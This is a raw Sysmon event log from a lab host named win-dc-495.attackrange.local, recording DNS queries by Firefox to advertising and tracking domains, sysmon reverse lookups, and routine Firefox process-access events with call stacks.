22542200x800000000000000018137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.047{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid.pubmatic.com0type: 5 hbopenbid22000nfc.pubmatic.com;type: 5 hbopenbid22000nf.pubmatic.com;::ffff:185.64.189.112;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.046{59A5CD1D-945A-6005-3305-00000000A301}7052e8037.i.akamaiedge.net023.47.217.34;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.046{59A5CD1D-945A-6005-3305-00000000A301}7052itx4.smartadserver.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.045{59A5CD1D-945A-6005-3305-00000000A301}7052htlb.casalemedia.com0type: 5 htlb.casalemedia.com.edgekey.net;type: 5 e8037.i.akamaiedge.net;::ffff:23.47.217.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.045{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api-fra02.omnitagjs.com0185.255.84.150;185.255.84.151;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052itx4.smartadserver.com0185.86.139.96;185.86.139.58;185.86.139.59;185.86.139.95;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052tagged-by.rubiconproject.net.akadns.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api.omnitagjs.com0type: 5 hb-api-fra02.omnitagjs.com;::ffff:185.255.84.151;::ffff:185.255.84.150;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052prg.smartadserver.com0type: 5 prga.smartadserver.com;type: 5 2-01-275d-0028.cdx.cedexis.net;type: 5 
itx4.smartadserver.com;::ffff:185.86.139.95;::ffff:185.86.139.96;::ffff:185.86.139.58;::ffff:185.86.139.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.043{59A5CD1D-945A-6005-3305-00000000A301}7052tagged-by.rubiconproject.net.akadns.net069.173.144.140;69.173.144.141;69.173.144.143;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.042{59A5CD1D-945A-6005-3305-00000000A301}7052fastlane.rubiconproject.com0type: 5 tagged-by.rubiconproject.net.akadns.net;::ffff:69.173.144.143;::ffff:69.173.144.140;::ffff:69.173.144.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.845{59A5CD1D-945A-6005-3305-00000000A301}7052jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.840{59A5CD1D-945A-6005-3305-00000000A301}7052jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com0151.139.240.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.839{59A5CD1D-945A-6005-3305-00000000A301}7052jita.rtk.io0type: 5 jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com;::ffff:151.139.240.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464114.137.86.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:55.561{59A5CD1D-8E56-6005-2E00-00000000A301}24645.74.125.104.in-addr.arpa.0type: 12 a104-125-74-5.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464249.204.58.52.in-addr.arpa.0type: 12 ec2-52-58-204-249.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.556{59A5CD1D-8E56-6005-2E00-00000000A301}246459.152.212.52.in-addr.arpa.0type: 12 ec2-52-212-152-59.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 10341000x800000000000000018119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.204{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.127{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.564{59A5CD1D-8E56-6005-2E00-00000000A301}2464112.189.64.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.564{59A5CD1D-8E56-6005-2E00-00000000A301}246438.172.252.37.in-addr.arpa.0type: 12 690.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net;C:\Windows\sysmon64.exe 22542200x800000000000000018161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.559{59A5CD1D-8E56-6005-2E00-00000000A301}246434.217.47.23.in-addr.arpa.0type: 12 a23-47-217-34.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.558{59A5CD1D-8E56-6005-2E00-00000000A301}246447.195.156.18.in-addr.arpa.0type: 12 ec2-18-156-195-47.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.557{59A5CD1D-8E56-6005-2E00-00000000A301}2464252.77.59.52.in-addr.arpa.0type: 12 ec2-52-59-77-252.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.557{59A5CD1D-8E56-6005-2E00-00000000A301}246495.139.86.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464187.16.220.54.in-addr.arpa.0type: 12 
ec2-54-220-16-187.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464128.89.184.18.in-addr.arpa.0type: 12 ec2-18-184-89-128.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.714{59A5CD1D-8E56-6005-2E00-00000000A301}246435.240.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464151.84.255.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464131.2.250.178.in-addr.arpa.0type: 12 bidder.am5.vip.prod.criteo.com;C:\Windows\sysmon64.exe 22542200x800000000000000018167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:57.799{59A5CD1D-8E56-6005-2E00-00000000A301}246482.107.75.147.in-addr.arpa.0type: 12 lbadstorm-pk-nj-101;C:\Windows\sysmon64.exe 10341000x800000000000000018169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.861{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 
Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.861{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla 
Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.759{59A5CD1D-945A-6005-3305-00000000A301}7052gum.par.vip.prod.criteo.com0178.250.0.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.758{59A5CD1D-945A-6005-3305-00000000A301}7052gum.criteo.com0type: 5 gum.par.vip.prod.criteo.com;::ffff:178.250.0.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.574{59A5CD1D-945A-6005-3305-00000000A301}7052static.am5.vip.prod.criteo.net02a02:2638:1::3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.573{59A5CD1D-945A-6005-3305-00000000A301}7052static.am5.vip.prod.criteo.net0178.250.2.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.572{59A5CD1D-945A-6005-3305-00000000A301}7052static.criteo.net0type: 5 static.am5.vip.prod.criteo.net;::ffff:178.250.2.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052e6603.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000018179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0::ffff:147.75.107.42;::ffff:147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.249{59A5CD1D-945A-6005-3305-00000000A301}7052e6603.g.akamaiedge.net0104.79.88.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.248{59A5CD1D-945A-6005-3305-00000000A301}7052ads.pubmatic.com0type: 5 pubmatic.edgekey.net;type: 5 e6603.g.akamaiedge.net;::ffff:104.79.88.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:02.633{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.2.250.178.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.760{59A5CD1D-945A-6005-3305-00000000A301}7052gum.par.vip.prod.criteo.com02a02:2638::1c;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.945{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.934{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.933{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000018206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.649{59A5CD1D-8E56-6005-2E00-00000000A301}2464155.88.79.104.in-addr.arpa.0type: 12 a104-79-88-155.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.648{59A5CD1D-8E56-6005-2E00-00000000A301}2464157.0.250.178.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.583{59A5CD1D-945A-6005-3305-00000000A301}7052prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.582{59A5CD1D-945A-6005-3305-00000000A301}7052prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com034.250.108.103;52.19.224.33;52.31.77.198;52.49.95.65;54.72.153.48;54.194.17.133;54.195.118.210;34.246.141.173;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.581{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com.akadns.net02001:678:cb4:bbbb::11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.581{59A5CD1D-945A-6005-3305-00000000A301}7052beacon.krxd.net0type: 5 beacon-dub-prod.krxd.net;type: 5 prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com;::ffff:34.246.141.173;::ffff:34.250.108.103;::ffff:52.19.224.33;::ffff:52.31.77.198;::ffff:52.49.95.65;::ffff:54.72.153.48;::ffff:54.194.17.133;::ffff:54.195.118.210;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:03.580{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com.akadns.net046.228.164.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.579{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com0type: 5 ad.turn.com.akadns.net;::ffff:46.228.164.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.578{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.576{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io052.49.193.31;52.214.70.9;54.72.203.0;54.171.14.147;54.228.192.197;52.31.242.159;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.575{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io0::ffff:52.31.242.159;::ffff:52.49.193.31;::ffff:52.214.70.9;::ffff:54.72.203.0;::ffff:54.171.14.147;::ffff:54.228.192.197;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.388{59A5CD1D-945A-6005-3305-00000000A301}7052a1213.g.akamai.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.386{59A5CD1D-945A-6005-3305-00000000A301}7052a1213.g.akamai.net02.22.119.59;2.22.119.9;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.386{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.trustwave.com0type: 5 ocsp.trustwave.com.edgesuite.net;type: 5 
a1213.g.akamai.net;::ffff:2.22.119.9;::ffff:2.22.119.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.287{59A5CD1D-945A-6005-3305-00000000A301}7052match-1943069928.eu-west-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.283{59A5CD1D-945A-6005-3305-00000000A301}7052match-1943069928.eu-west-1.elb.amazonaws.com054.171.98.69;54.216.123.169;54.228.21.183;18.200.32.159;18.203.78.129;52.31.46.99;52.210.149.10;54.154.164.132;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.282{59A5CD1D-945A-6005-3305-00000000A301}7052match.adsrvr.org0type: 5 match-1943069928.eu-west-1.elb.amazonaws.com;::ffff:54.154.164.132;::ffff:54.171.98.69;::ffff:54.216.123.169;::ffff:54.228.21.183;::ffff:18.200.32.159;::ffff:18.203.78.129;::ffff:52.31.46.99;::ffff:52.210.149.10;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.268{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.267{59A5CD1D-945A-6005-3305-00000000A301}7052e8960.b.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.266{59A5CD1D-945A-6005-3305-00000000A301}7052e6115.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:03.265{59A5CD1D-945A-6005-3305-00000000A301}7052e8960.b.akamaiedge.net023.211.161.129;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.265{59A5CD1D-945A-6005-3305-00000000A301}7052eus.rubiconproject.com0type: 5 eus.rubiconproject.com.edgekey.net;type: 5 e8960.b.akamaiedge.net;::ffff:23.211.161.129;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.264{59A5CD1D-945A-6005-3305-00000000A301}7052e6115.g.akamaiedge.net0104.79.88.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.264{59A5CD1D-945A-6005-3305-00000000A301}7052acdn.adnxs.com0type: 5 secure-adnxs.edgekey.net;type: 5 e6115.g.akamaiedge.net;::ffff:104.79.88.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.251{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.314{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.240{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.158{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program 
